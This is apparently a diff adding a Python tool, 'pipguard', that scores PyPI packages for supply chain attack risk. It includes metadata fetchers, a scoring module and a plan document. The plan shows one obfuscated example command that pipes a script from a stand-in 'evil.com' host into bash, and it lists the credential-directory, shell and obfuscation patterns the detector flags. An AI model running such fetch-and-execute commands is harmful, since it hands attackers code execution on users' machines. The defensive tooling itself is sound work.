|
|
5
|
+
|
|
6
|
+
async def check_vulns(package: str, version: str) -> list[dict]:
|
|
7
|
+
payload = {
|
|
8
|
+
"version": version,
|
|
9
|
+
"package": {"name": package, "ecosystem": "PyPI"},
|
|
10
|
+
}
|
|
11
|
+
async with httpx.AsyncClient(timeout=10) as client:
|
|
12
|
+
r = await client.post(OSV_URL, json=payload)
|
|
13
|
+
r.raise_for_status()
|
|
14
|
+
data = r.json()
|
|
15
|
+
|
|
16
|
+
return [
|
|
17
|
+
{"id": v["id"], "summary": v.get("summary", "No description")}
|
|
18
|
+
for v in data.get("vulns", [])
|
|
19
|
+
]
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
from datetime import datetime, timezone
|
|
2
|
+
|
|
3
|
+
import httpx
|
|
4
|
+
|
|
5
|
+
PYPI_URL = "https://pypi.org/pypi/{package}/json"
|
|
6
|
+
PYPI_VERSION_URL = "https://pypi.org/pypi/{package}/{version}/json"
|
|
7
|
+
PYPISTATS_URL = "https://pypistats.org/api/packages/{package}/recent"
|
|
8
|
+
|
|
9
|
+
|
|
10
|
+
async def fetch_metadata(package: str, version: str | None = None) -> dict:
|
|
11
|
+
url = (
|
|
12
|
+
PYPI_VERSION_URL.format(package=package, version=version)
|
|
13
|
+
if version
|
|
14
|
+
else PYPI_URL.format(package=package)
|
|
15
|
+
)
|
|
16
|
+
async with httpx.AsyncClient(timeout=10) as client:
|
|
17
|
+
r = await client.get(url)
|
|
18
|
+
r.raise_for_status()
|
|
19
|
+
data = r.json()
|
|
20
|
+
|
|
21
|
+
info = data["info"]
|
|
22
|
+
releases = data.get("releases", {})
|
|
23
|
+
|
|
24
|
+
# Earliest release date across all versions
|
|
25
|
+
all_dates = []
|
|
26
|
+
for files in releases.values():
|
|
27
|
+
for f in files:
|
|
28
|
+
if f.get("upload_time"):
|
|
29
|
+
all_dates.append(
|
|
30
|
+
datetime.fromisoformat(f["upload_time"]).replace(tzinfo=timezone.utc)
|
|
31
|
+
)
|
|
32
|
+
first_release = min(all_dates) if all_dates else None
|
|
33
|
+
age_days = (datetime.now(timezone.utc) - first_release).days if first_release else None
|
|
34
|
+
|
|
35
|
+
# GitHub repo from project_urls or home_page
|
|
36
|
+
project_urls = info.get("project_urls") or {}
|
|
37
|
+
candidates = list(project_urls.values()) + [info.get("home_page") or ""]
|
|
38
|
+
github_url = next((u for u in candidates if u and "github.com" in u), None)
|
|
39
|
+
|
|
40
|
+
# Source tarball URL — version-specific endpoint puts files under data["urls"],
|
|
41
|
+
# the non-version endpoint puts them under releases[version]
|
|
42
|
+
target_version = version or info["version"]
|
|
43
|
+
tarball_url = None
|
|
44
|
+
candidate_files = data.get("urls") or releases.get(target_version, [])
|
|
45
|
+
for f in candidate_files:
|
|
46
|
+
if f.get("packagetype") == "sdist":
|
|
47
|
+
tarball_url = f["url"]
|
|
48
|
+
break
|
|
49
|
+
|
|
50
|
+
return {
|
|
51
|
+
"name": info["name"],
|
|
52
|
+
"version": target_version,
|
|
53
|
+
"age_days": age_days,
|
|
54
|
+
"classifiers": info.get("classifiers") or [],
|
|
55
|
+
"github_url": github_url,
|
|
56
|
+
"maintainer": info.get("maintainer") or info.get("author"),
|
|
57
|
+
"tarball_url": tarball_url,
|
|
58
|
+
"release_count": len(releases),
|
|
59
|
+
}
|
|
60
|
+
|
|
61
|
+
|
|
62
|
+
async def fetch_download_stats(package: str) -> dict:
|
|
63
|
+
async with httpx.AsyncClient(timeout=10) as client:
|
|
64
|
+
r = await client.get(PYPISTATS_URL.format(package=package))
|
|
65
|
+
if r.status_code != 200:
|
|
66
|
+
return {"last_week": None, "last_month": None, "spike_pct": None}
|
|
67
|
+
data = r.json()["data"]
|
|
68
|
+
|
|
69
|
+
last_week = data.get("last_week") or 0
|
|
70
|
+
last_month = data.get("last_month") or 0
|
|
71
|
+
|
|
72
|
+
# Expected weekly = monthly / 4; spike = how much this week exceeds that
|
|
73
|
+
expected_weekly = last_month / 4 if last_month else 0
|
|
74
|
+
spike_pct = (
|
|
75
|
+
(last_week - expected_weekly) / expected_weekly * 100
|
|
76
|
+
if expected_weekly > 0
|
|
77
|
+
else None
|
|
78
|
+
)
|
|
79
|
+
|
|
80
|
+
return {
|
|
81
|
+
"last_week": last_week,
|
|
82
|
+
"last_month": last_month,
|
|
83
|
+
"spike_pct": spike_pct,
|
|
84
|
+
}
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
_WEIGHTS = {
|
|
2
|
+
"known_cve": 50,
|
|
3
|
+
"shell_exec": 40,
|
|
4
|
+
"base64_obfuscation": 35,
|
|
5
|
+
"package_new": 30,
|
|
6
|
+
"home_dir_access": 30,
|
|
7
|
+
"network_call_full": 25, # pure Python package making network calls
|
|
8
|
+
"network_call_discounted": 8, # network calls expected for this package type
|
|
9
|
+
"env_access": 20,
|
|
10
|
+
"maintainer_new": 20,
|
|
11
|
+
"download_spike": 15,
|
|
12
|
+
"no_github": 10,
|
|
13
|
+
}
|
|
14
|
+
|
|
15
|
+
|
|
16
|
+
def compute(
|
|
17
|
+
metadata: dict,
|
|
18
|
+
download_stats: dict,
|
|
19
|
+
vulns: list[dict],
|
|
20
|
+
analysis_flags: dict,
|
|
21
|
+
classifier_context: str, # 'pure_python' | 'network_expected' | 'ambiguous'
|
|
22
|
+
readme_context: str, # 'network_expected' | 'pure_python' | 'unknown'
|
|
23
|
+
) -> dict:
|
|
24
|
+
score = 0
|
|
25
|
+
signals: dict[str, int] = {}
|
|
26
|
+
|
|
27
|
+
def add(label: str, pts: int):
|
|
28
|
+
nonlocal score
|
|
29
|
+
score += pts
|
|
30
|
+
signals[label] = pts
|
|
31
|
+
|
|
32
|
+
if vulns:
|
|
33
|
+
add(f"Known CVE ({vulns[0]['id']})", _WEIGHTS["known_cve"])
|
|
34
|
+
|
|
35
|
+
age_days = metadata.get("age_days")
|
|
36
|
+
if age_days is not None and age_days < 30:
|
|
37
|
+
add(f"Package < 30 days old ({age_days}d)", _WEIGHTS["package_new"])
|
|
38
|
+
|
|
39
|
+
spike_pct = download_stats.get("spike_pct")
|
|
40
|
+
last_month = download_stats.get("last_month") or 0
|
|
41
|
+
if spike_pct and spike_pct > 300 and last_month < 50_000:
|
|
42
|
+
add(f"Download spike +{spike_pct:.0f}%", _WEIGHTS["download_spike"])
|
|
43
|
+
|
|
44
|
+
if not metadata.get("github_url"):
|
|
45
|
+
add("No GitHub repo linked", _WEIGHTS["no_github"])
|
|
46
|
+
|
|
47
|
+
if analysis_flags.get("shell_exec"):
|
|
48
|
+
add("Shell execution in setup.py", _WEIGHTS["shell_exec"])
|
|
49
|
+
|
|
50
|
+
if analysis_flags.get("base64_obfuscation"):
|
|
51
|
+
add("Base64 obfuscation", _WEIGHTS["base64_obfuscation"])
|
|
52
|
+
|
|
53
|
+
if analysis_flags.get("home_dir_access"):
|
|
54
|
+
add("Home directory access", _WEIGHTS["home_dir_access"])
|
|
55
|
+
|
|
56
|
+
if analysis_flags.get("env_access"):
|
|
57
|
+
add("Env variable access", _WEIGHTS["env_access"])
|
|
58
|
+
|
|
59
|
+
if analysis_flags.get("network_call"):
|
|
60
|
+
network_expected = (
|
|
61
|
+
classifier_context == "network_expected"
|
|
62
|
+
or readme_context == "network_expected"
|
|
63
|
+
)
|
|
64
|
+
if classifier_context == "pure_python":
|
|
65
|
+
add(
|
|
66
|
+
"Network call in setup.py (unexpected for pure Python)",
|
|
67
|
+
_WEIGHTS["network_call_full"],
|
|
68
|
+
)
|
|
69
|
+
elif network_expected:
|
|
70
|
+
add(
|
|
71
|
+
"Network call in setup.py (expected for this package type)",
|
|
72
|
+
_WEIGHTS["network_call_discounted"],
|
|
73
|
+
)
|
|
74
|
+
else:
|
|
75
|
+
add("Network call in setup.py", _WEIGHTS["network_call_full"])
|
|
76
|
+
|
|
77
|
+
if score <= 30:
|
|
78
|
+
verdict = "LOW"
|
|
79
|
+
elif score <= 60:
|
|
80
|
+
verdict = "MEDIUM"
|
|
81
|
+
else:
|
|
82
|
+
verdict = "HIGH"
|
|
83
|
+
|
|
84
|
+
return {"score": score, "verdict": verdict, "signals": signals}
|
|
@@ -0,0 +1,165 @@
|
|
|
1
|
+
# pipguard — Plan & Scope
|
|
2
|
+
|
|
3
|
+
> "Know what you're installing before you install it."
|
|
4
|
+
|
|
5
|
+
A CLI tool that intercepts `pip install` and analyzes packages for supply chain attacks before they touch your system. The data to detect malicious packages already exists — PyPI, OSV.dev, GitHub. The gap is workflow integration. Nobody has made checking automatic at the exact moment of install.
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## The Problem
|
|
10
|
+
|
|
11
|
+
Supply chain attacks are increasing, especially in AI/ML where developers install unfamiliar packages constantly. Attack vectors: typosquatting (`reqeusts`, `nunpy`), dependency confusion, account takeover, slow poisoning (xz utils 2024), maintainer going rogue (colors.js). Common payload: steal API keys/SSH keys, open backdoors — all through `setup.py` which executes automatically on install.
|
|
12
|
+
|
|
13
|
+
---
|
|
14
|
+
|
|
15
|
+
## Architecture
|
|
16
|
+
|
|
17
|
+
### Layer 1 — Trust Score (API calls, no download)
|
|
18
|
+
|
|
19
|
+
| Signal | Source |
|
|
20
|
+
|--------|--------|
|
|
21
|
+
| Package age, version history | PyPI JSON API |
|
|
22
|
+
| Download spike > 300% week-over-week AND total downloads < 50k | pypistats.org |
|
|
23
|
+
| No linked GitHub repo | PyPI JSON API |
|
|
24
|
+
| Maintainer account age, # of other packages | PyPI JSON API |
|
|
25
|
+
| Maintainer changed between versions | PyPI JSON API |
|
|
26
|
+
| Known CVEs | OSV.dev API |
|
|
27
|
+
| GitHub README (only when classifiers are ambiguous) | GitHub API |
|
|
28
|
+
|
|
29
|
+
### Layer 2 — Static Code Analysis (AST-based)
|
|
30
|
+
|
|
31
|
+
Downloads the source tarball and analyzes `setup.py`, `pyproject.toml`, `__init__.py` — without executing anything.
|
|
32
|
+
|
|
33
|
+
Flags: network requests, env var access (`os.environ`), home dir access (`~/.ssh`, `~/.aws`), shell execution (`subprocess`, `eval`, `exec`), base64 obfuscation, DNS lookups.
|
|
34
|
+
|
|
35
|
+
**Why AST over grep:** AST catches obfuscated patterns grep misses:
|
|
36
|
+
```python
|
|
37
|
+
getattr(os, 'sys'+'tem')('curl evil.com | bash') # grep misses, AST catches
|
|
38
|
+
```
|
|
39
|
+
|
|
40
|
+
---
|
|
41
|
+
|
|
42
|
+
## Scoring
|
|
43
|
+
|
|
44
|
+
```
|
|
45
|
+
0–30 → LOW RISK 31–60 → MEDIUM RISK 61+ → HIGH RISK
|
|
46
|
+
```
|
|
47
|
+
|
|
48
|
+
| Signal | Points |
|
|
49
|
+
|--------|--------|
|
|
50
|
+
| Known CVE | +50 |
|
|
51
|
+
| Shell execution in setup.py | +40 |
|
|
52
|
+
| Base64 obfuscation | +35 |
|
|
53
|
+
| Package < 30 days old | +30 |
|
|
54
|
+
| Home directory access | +30 |
|
|
55
|
+
| Network call in setup.py | +25 |
|
|
56
|
+
| Reads env variables | +20 |
|
|
57
|
+
| Maintainer account < 60 days old | +20 |
|
|
58
|
+
| Download spike (< 50k total only) | +15 |
|
|
59
|
+
| No GitHub repo | +10 |
|
|
60
|
+
|
|
61
|
+
**Context-aware:** same flag scores differently based on trust profile. Network call from a 4-year-old package with 50M downloads weighs less than the same flag from a 2-week-old package. Age and downloads compound.
|
|
62
|
+
|
|
63
|
+
**No static whitelist.** A whitelist creates a blind spot — a compromised boto3 would silently pass. Context-aware scoring + classifier gating handles false positives without a trust bypass.
|
|
64
|
+
|
|
65
|
+
**Configurable weights** via `~/.pipguard/config.toml`. Ships with a `recommended` preset. Warns when user deviates significantly: `"Custom weights active — run pipguard config reset to restore recommended"`.
|
|
66
|
+
|
|
67
|
+
---
|
|
68
|
+
|
|
69
|
+
## Classifier-Gated GitHub Calls
|
|
70
|
+
|
|
71
|
+
PyPI classifiers (free — already in the PyPI response) gate whether the GitHub README call is made. GitHub's unauthenticated limit is 60 req/hr — a 20-package scan exhausts it fast without gating.
|
|
72
|
+
|
|
73
|
+
```
|
|
74
|
+
Pure Python classifiers + network call found → FLAG at full weight, skip GitHub
|
|
75
|
+
Networking / AI / Build Tools classifiers → Fetch GitHub README, discount if intent matches
|
|
76
|
+
No useful classifiers → Fetch GitHub README, default weight if unclear
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
**Pure Python classifiers:** `Topic :: Utilities`, `Topic :: Text Processing`, `Topic :: Software Development :: Libraries :: Python Modules`
|
|
80
|
+
|
|
81
|
+
**"Network expected" classifiers:** `Topic :: Internet :: WWW/HTTP`, `Topic :: System :: Networking`, `Topic :: Scientific/Engineering :: Artificial Intelligence`, `Topic :: Software Development :: Build Tools`
|
|
82
|
+
|
|
83
|
+
---
|
|
84
|
+
|
|
85
|
+
## CLI
|
|
86
|
+
|
|
87
|
+
```bash
|
|
88
|
+
pipguard install <package> # analyze then install
|
|
89
|
+
pipguard scan # scan requirements.txt
|
|
90
|
+
pipguard scan --ci --fail-on [medium|high] # CI mode, exits 1 on threshold (default: high)
|
|
91
|
+
pipguard info <package> [--no-cache] # report without installing
|
|
92
|
+
pipguard history # past scan results
|
|
93
|
+
pipguard update --force # wipe + refresh CVE cache immediately
|
|
94
|
+
```
|
|
95
|
+
|
|
96
|
+
**Interception:** uses pip's official plugin API (pip 23.1+), not a shell alias. An alias that crashes locks the developer out of pip entirely. A plugin degrades gracefully.
|
|
97
|
+
|
|
98
|
+
**Example output:**
|
|
99
|
+
```
|
|
100
|
+
$ pipguard install litellm
|
|
101
|
+
|
|
102
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
103
|
+
TRUST SCORE
|
|
104
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
105
|
+
Package age: 2 months ⚠️
|
|
106
|
+
Maintainer age: 3 weeks 🔴
|
|
107
|
+
Download spike: +380% ⚠️
|
|
108
|
+
Other packages: 0 🔴
|
|
109
|
+
Known vulns: 0 ✅
|
|
110
|
+
|
|
111
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
112
|
+
CODE ANALYSIS (setup.py)
|
|
113
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
114
|
+
Network requests: FOUND 🔴
|
|
115
|
+
Env var access: FOUND 🔴
|
|
116
|
+
Shell execution: NOT FOUND ✅
|
|
117
|
+
Obfuscation: NOT FOUND ✅
|
|
118
|
+
|
|
119
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
120
|
+
VERDICT: 🔴 HIGH RISK (Score: 75)
|
|
121
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
122
|
+
Proceed anyway? [y/N]
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
---
|
|
126
|
+
|
|
127
|
+
## Tech Stack
|
|
128
|
+
|
|
129
|
+
| Component | Choice |
|
|
130
|
+
|-----------|--------|
|
|
131
|
+
| Language | Python (dogfoods itself) |
|
|
132
|
+
| CLI | Typer |
|
|
133
|
+
| HTTP | httpx (API calls + tarball downloads — no requests) |
|
|
134
|
+
| AST | Python `ast` stdlib |
|
|
135
|
+
| Output | Rich |
|
|
136
|
+
| Cache | SQLite stdlib (`~/.pipguard/cache.db`) |
|
|
137
|
+
|
|
138
|
+
**Caching:** trust scores cached 24hr, CVE data 6hr. Shows `(cached)` on hits. `--no-cache` bypasses per-run. `pipguard update --force` wipes CVE cache immediately for zero-day events.
|
|
139
|
+
|
|
140
|
+
**Version pinning:** always checks the exact pinned version from requirements.txt, not latest. Warns on unpinned deps.
|
|
141
|
+
|
|
142
|
+
---
|
|
143
|
+
|
|
144
|
+
## Build Order
|
|
145
|
+
|
|
146
|
+
**Week 1 — Core**
|
|
147
|
+
- [ ] CLI skeleton (Typer), PyPI fetch, OSV.dev check, scoring, SQLite cache
|
|
148
|
+
|
|
149
|
+
**Week 2 — Code Analysis**
|
|
150
|
+
- [ ] Tarball download (httpx, version-specific), AST parser, red flag detection, classifier-gated scoring, GitHub README for ambiguous cases
|
|
151
|
+
|
|
152
|
+
**Week 3 — Polish**
|
|
153
|
+
- [ ] Rich output, requirements.txt scan, pip plugin integration, `--ci`/`--fail-on`/`--no-cache`/`--force`, configurable weights + preset warning, README + demo GIF
|
|
154
|
+
|
|
155
|
+
---
|
|
156
|
+
|
|
157
|
+
## vs. Existing Tools
|
|
158
|
+
|
|
159
|
+
| Tool | Gap |
|
|
160
|
+
|------|-----|
|
|
161
|
+
| `pip audit` | Only known CVEs — misses new malicious packages |
|
|
162
|
+
| socket.dev | Not a CLI intercept, separate workflow |
|
|
163
|
+
| OSV.dev | Database only, no workflow integration |
|
|
164
|
+
| Dependabot | Reacts after install, not before |
|
|
165
|
+
| **pipguard** | Intercepts at install, combines trust signals + AST analysis |
|
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
[build-system]
|
|
2
|
+
requires = ["hatchling"]
|
|
3
|
+
build-backend = "hatchling.build"
|
|
4
|
+
|
|
5
|
+
[project]
|
|
6
|
+
name = "pipguard-cli"
|
|
7
|
+
version = "0.1.0"
|
|
8
|
+
description = "Supply chain attack prevention for pip installs"
|
|
9
|
+
requires-python = ">=3.10"
|
|
10
|
+
dependencies = [
|
|
11
|
+
"typer>=0.9.0",
|
|
12
|
+
"httpx>=0.27.0",
|
|
13
|
+
"rich>=13.0.0",
|
|
14
|
+
]
|
|
15
|
+
|
|
16
|
+
[project.scripts]
|
|
17
|
+
pipguard = "pipguard.main:app"
|
|
18
|
+
|
|
19
|
+
[tool.hatch.build.targets.wheel]
|
|
20
|
+
packages = ["pipguard"]
|